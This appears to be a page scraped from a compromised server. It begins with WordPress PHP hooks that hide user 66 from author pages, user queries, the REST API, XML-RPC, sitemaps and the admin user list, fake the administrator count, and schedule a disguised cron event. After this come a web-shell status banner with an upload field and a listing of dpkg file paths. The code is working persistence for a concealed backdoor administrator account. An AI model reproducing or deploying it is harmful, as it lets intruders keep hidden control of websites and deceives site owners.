add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
/. /etc /etc/alternatives /etc/alternatives/README /etc/cron.daily /etc/cron.daily/dpkg /etc/dpkg /etc/dpkg/dpkg.cfg /etc/dpkg/dpkg.cfg.d /etc/logrotate.d /etc/logrotate.d/alternatives /etc/logrotate.d/dpkg /usr /usr/bin /usr/bin/dpkg /usr/bin/dpkg-deb /usr/bin/dpkg-divert /usr/bin/dpkg-maintscript-helper /usr/bin/dpkg-query /usr/bin/dpkg-realpath /usr/bin/dpkg-split /usr/bin/dpkg-statoverride /usr/bin/dpkg-trigger /usr/bin/update-alternatives /usr/lib /usr/lib/systemd /usr/lib/systemd/system /usr/lib/systemd/system/dpkg-db-backup.service /usr/lib/systemd/system/dpkg-db-backup.timer /usr/libexec /usr/libexec/dpkg /usr/libexec/dpkg/dpkg-db-backup /usr/libexec/dpkg/dpkg-db-keeper /usr/sbin /usr/sbin/start-stop-daemon /usr/share /usr/share/bug /usr/share/bug/dpkg /usr/share/doc /usr/share/doc/dpkg /usr/share/doc/dpkg/AUTHORS /usr/share/doc/dpkg/README.api /usr/share/doc/dpkg/README.bug-usertags.gz /usr/share/doc/dpkg/README.feature-removal-schedule.gz /usr/share/doc/dpkg/THANKS.gz /usr/share/doc/dpkg/changelog.gz /usr/share/doc/dpkg/copyright /usr/share/dpkg /usr/share/dpkg/abitable /usr/share/dpkg/cputable /usr/share/dpkg/ostable /usr/share/dpkg/sh /usr/share/dpkg/sh/dpkg-error.sh /usr/share/dpkg/tupletable /usr/share/lintian /usr/share/lintian/overrides /usr/share/lintian/overrides/dpkg /usr/share/lintian/profiles /usr/share/lintian/profiles/dpkg /usr/share/lintian/profiles/dpkg/main.profile /usr/share/locale /usr/share/locale/ast /usr/share/locale/ast/LC_MESSAGES /usr/share/locale/ast/LC_MESSAGES/dpkg.mo /usr/share/locale/bs /usr/share/locale/bs/LC_MESSAGES /usr/share/locale/bs/LC_MESSAGES/dpkg.mo /usr/share/locale/ca /usr/share/locale/ca/LC_MESSAGES /usr/share/locale/ca/LC_MESSAGES/dpkg.mo /usr/share/locale/cs /usr/share/locale/cs/LC_MESSAGES /usr/share/locale/cs/LC_MESSAGES/dpkg.mo /usr/share/locale/da /usr/share/locale/da/LC_MESSAGES /usr/share/locale/da/LC_MESSAGES/dpkg.mo /usr/share/locale/de /usr/share/locale/de/LC_MESSAGES /usr/share/locale/de/LC_MESSAGES/dpkg.mo /usr/share/locale/dz /usr/share/locale/dz/LC_MESSAGES /usr/share/locale/dz/LC_MESSAGES/dpkg.mo /usr/share/locale/el /usr/share/locale/el/LC_MESSAGES /usr/share/locale/el/LC_MESSAGES/dpkg.mo /usr/share/locale/eo /usr/share/locale/eo/LC_MESSAGES /usr/share/locale/eo/LC_MESSAGES/dpkg.mo /usr/share/locale/es /usr/share/locale/es/LC_MESSAGES /usr/share/locale/es/LC_MESSAGES/dpkg.mo /usr/share/locale/et /usr/share/locale/et/LC_MESSAGES /usr/share/locale/et/LC_MESSAGES/dpkg.mo /usr/share/locale/eu /usr/share/locale/eu/LC_MESSAGES /usr/share/locale/eu/LC_MESSAGES/dpkg.mo /usr/share/locale/fr /usr/share/locale/fr/LC_MESSAGES /usr/share/locale/fr/LC_MESSAGES/dpkg.mo /usr/share/locale/gl /usr/share/locale/gl/LC_MESSAGES /usr/share/locale/gl/LC_MESSAGES/dpkg.mo /usr/share/locale/hu /usr/share/locale/hu/LC_MESSAGES /usr/share/locale/hu/LC_MESSAGES/dpkg.mo /usr/share/locale/id /usr/share/locale/id/LC_MESSAGES /usr/share/locale/id/LC_MESSAGES/dpkg.mo /usr/share/locale/it /usr/share/locale/it/LC_MESSAGES /usr/share/locale/it/LC_MESSAGES/dpkg.mo /usr/share/locale/ja /usr/share/locale/ja/LC_MESSAGES /usr/share/locale/ja/LC_MESSAGES/dpkg.mo /usr/share/locale/km /usr/share/locale/km/LC_MESSAGES /usr/share/locale/km/LC_MESSAGES/dpkg.mo /usr/share/locale/ko /usr/share/locale/ko/LC_MESSAGES /usr/share/locale/ko/LC_MESSAGES/dpkg.mo /usr/share/locale/ku /usr/share/locale/ku/LC_MESSAGES /usr/share/locale/ku/LC_MESSAGES/dpkg.mo /usr/share/locale/lt /usr/share/locale/lt/LC_MESSAGES /usr/share/locale/lt/LC_MESSAGES/dpkg.mo /usr/share/locale/mr /usr/share/locale/mr/LC_MESSAGES /usr/share/locale/mr/LC_MESSAGES/dpkg.mo /usr/share/locale/nb /usr/share/locale/nb/LC_MESSAGES /usr/share/locale/nb/LC_MESSAGES/dpkg.mo /usr/share/locale/ne /usr/share/locale/ne/LC_MESSAGES /usr/share/locale/ne/LC_MESSAGES/dpkg.mo /usr/share/locale/nl /usr/share/locale/nl/LC_MESSAGES /usr/share/locale/nl/LC_MESSAGES/dpkg.mo /usr/share/locale/nn /usr/share/locale/nn/LC_MESSAGES /usr/share/locale/nn/LC_MESSAGES/dpkg.mo /usr/share/locale/oc /usr/share/locale/oc/LC_MESSAGES /usr/share/locale/oc/LC_MESSAGES/dpkg.mo /usr/share/locale/pa /usr/share/locale/pa/LC_MESSAGES /usr/share/locale/pa/LC_MESSAGES/dpkg.mo /usr/share/locale/pl /usr/share/locale/pl/LC_MESSAGES /usr/share/locale/pl/LC_MESSAGES/dpkg.mo /usr/share/locale/pt /usr/share/locale/pt/LC_MESSAGES /usr/share/locale/pt/LC_MESSAGES/dpkg.mo /usr/share/locale/pt_BR /usr/share/locale/pt_BR/LC_MESSAGES /usr/share/locale/pt_BR/LC_MESSAGES/dpkg.mo /usr/share/locale/ro /usr/share/locale/ro/LC_MESSAGES /usr/share/locale/ro/LC_MESSAGES/dpkg.mo /usr/share/locale/ru /usr/share/locale/ru/LC_MESSAGES /usr/share/locale/ru/LC_MESSAGES/dpkg.mo /usr/share/locale/sk /usr/share/locale/sk/LC_MESSAGES /usr/share/locale/sk/LC_MESSAGES/dpkg.mo /usr/share/locale/sv /usr/share/locale/sv/LC_MESSAGES /usr/share/locale/sv/LC_MESSAGES/dpkg.mo /usr/share/locale/th /usr/share/locale/th/LC_MESSAGES /usr/share/locale/th/LC_MESSAGES/dpkg.mo /usr/share/locale/tl /usr/share/locale/tl/LC_MESSAGES /usr/share/locale/tl/LC_MESSAGES/dpkg.mo /usr/share/locale/tr /usr/share/locale/tr/LC_MESSAGES /usr/share/locale/tr/LC_MESSAGES/dpkg.mo /usr/share/locale/vi /usr/share/locale/vi/LC_MESSAGES /usr/share/locale/vi/LC_MESSAGES/dpkg.mo /usr/share/locale/zh_CN /usr/share/locale/zh_CN/LC_MESSAGES /usr/share/locale/zh_CN/LC_MESSAGES/dpkg.mo /usr/share/locale/zh_TW /usr/share/locale/zh_TW/LC_MESSAGES /usr/share/locale/zh_TW/LC_MESSAGES/dpkg.mo /usr/share/man /usr/share/man/de /usr/share/man/de/man1 /usr/share/man/de/man1/dpkg-deb.1.gz /usr/share/man/de/man1/dpkg-divert.1.gz /usr/share/man/de/man1/dpkg-maintscript-helper.1.gz /usr/share/man/de/man1/dpkg-query.1.gz /usr/share/man/de/man1/dpkg-realpath.1.gz /usr/share/man/de/man1/dpkg-split.1.gz /usr/share/man/de/man1/dpkg-statoverride.1.gz /usr/share/man/de/man1/dpkg-trigger.1.gz /usr/share/man/de/man1/dpkg.1.gz /usr/share/man/de/man1/update-alternatives.1.gz /usr/share/man/de/man5 /usr/share/man/de/man5/dpkg.cfg.5.gz /usr/share/man/de/man8 /usr/share/man/de/man8/start-stop-daemon.8.gz /usr/share/man/es /usr/share/man/es/man5 /usr/share/man/es/man5/dpkg.cfg.5.gz /usr/share/man/fr /usr/share/man/fr/man1 /usr/share/man/fr/man1/dpkg-deb.1.gz /usr/share/man/fr/man1/dpkg-divert.1.gz /usr/share/man/fr/man1/dpkg-maintscript-helper.1.gz /usr/share/man/fr/man1/dpkg-query.1.gz /usr/share/man/fr/man1/dpkg-realpath.1.gz /usr/share/man/fr/man1/dpkg-split.1.gz /usr/share/man/fr/man1/dpkg-statoverride.1.gz /usr/share/man/fr/man1/dpkg-trigger.1.gz /usr/share/man/fr/man1/update-alternatives.1.gz /usr/share/man/fr/man5 /usr/share/man/fr/man5/dpkg.cfg.5.gz /usr/share/man/fr/man8 /usr/share/man/fr/man8/start-stop-daemon.8.gz /usr/share/man/it /usr/share/man/it/man5 /usr/share/man/it/man5/dpkg.cfg.5.gz /usr/share/man/ja /usr/share/man/ja/man5 /usr/share/man/ja/man5/dpkg.cfg.5.gz /usr/share/man/man1 /usr/share/man/man1/dpkg-deb.1.gz /usr/share/man/man1/dpkg-divert.1.gz /usr/share/man/man1/dpkg-maintscript-helper.1.gz /usr/share/man/man1/dpkg-query.1.gz /usr/share/man/man1/dpkg-realpath.1.gz /usr/share/man/man1/dpkg-split.1.gz /usr/share/man/man1/dpkg-statoverride.1.gz /usr/share/man/man1/dpkg-trigger.1.gz /usr/share/man/man1/dpkg.1.gz /usr/share/man/man1/update-alternatives.1.gz /usr/share/man/man5 /usr/share/man/man5/dpkg.cfg.5.gz /usr/share/man/man8 /usr/share/man/man8/start-stop-daemon.8.gz /usr/share/man/nl /usr/share/man/nl/man1 /usr/share/man/nl/man1/dpkg-deb.1.gz /usr/share/man/nl/man1/dpkg-divert.1.gz /usr/share/man/nl/man1/dpkg-maintscript-helper.1.gz /usr/share/man/nl/man1/dpkg-query.1.gz /usr/share/man/nl/man1/dpkg-realpath.1.gz /usr/share/man/nl/man1/dpkg-split.1.gz /usr/share/man/nl/man1/dpkg-statoverride.1.gz /usr/share/man/nl/man1/dpkg-trigger.1.gz /usr/share/man/nl/man1/dpkg.1.gz /usr/share/man/nl/man1/update-alternatives.1.gz /usr/share/man/nl/man5 /usr/share/man/nl/man5/dpkg.cfg.5.gz /usr/share/man/nl/man8 /usr/share/man/nl/man8/start-stop-daemon.8.gz /usr/share/man/pl /usr/share/man/pl/man5 /usr/share/man/pl/man5/dpkg.cfg.5.gz /usr/share/man/pt /usr/share/man/pt/man1 /usr/share/man/pt/man1/dpkg-deb.1.gz /usr/share/man/pt/man1/dpkg-divert.1.gz /usr/share/man/pt/man1/dpkg-maintscript-helper.1.gz /usr/share/man/pt/man1/dpkg-query.1.gz /usr/share/man/pt/man1/dpkg-realpath.1.gz /usr/share/man/pt/man1/dpkg-split.1.gz /usr/share/man/pt/man1/dpkg-statoverride.1.gz /usr/share/man/pt/man1/dpkg-trigger.1.gz /usr/share/man/pt/man1/dpkg.1.gz /usr/share/man/pt/man1/update-alternatives.1.gz /usr/share/man/pt/man5 /usr/share/man/pt/man5/dpkg.cfg.5.gz /usr/share/man/pt/man8 /usr/share/man/pt/man8/start-stop-daemon.8.gz /usr/share/man/sv /usr/share/man/sv/man1 /usr/share/man/sv/man1/dpkg-deb.1.gz /usr/share/man/sv/man1/dpkg-divert.1.gz /usr/share/man/sv/man1/dpkg-maintscript-helper.1.gz /usr/share/man/sv/man1/dpkg-query.1.gz /usr/share/man/sv/man1/dpkg-realpath.1.gz /usr/share/man/sv/man1/dpkg-split.1.gz /usr/share/man/sv/man1/dpkg-statoverride.1.gz /usr/share/man/sv/man1/dpkg-trigger.1.gz /usr/share/man/sv/man1/dpkg.1.gz /usr/share/man/sv/man1/update-alternatives.1.gz /usr/share/man/sv/man5 /usr/share/man/sv/man5/dpkg.cfg.5.gz /usr/share/man/sv/man8 /usr/share/man/sv/man8/start-stop-daemon.8.gz /usr/share/polkit-1 /usr/share/polkit-1/actions /usr/share/polkit-1/actions/org.dpkg.pkexec.update-alternatives.policy /var /var/lib /var/lib/dpkg /var/lib/dpkg/alternatives /var/lib/dpkg/info /var/lib/dpkg/parts /var/lib/dpkg/updates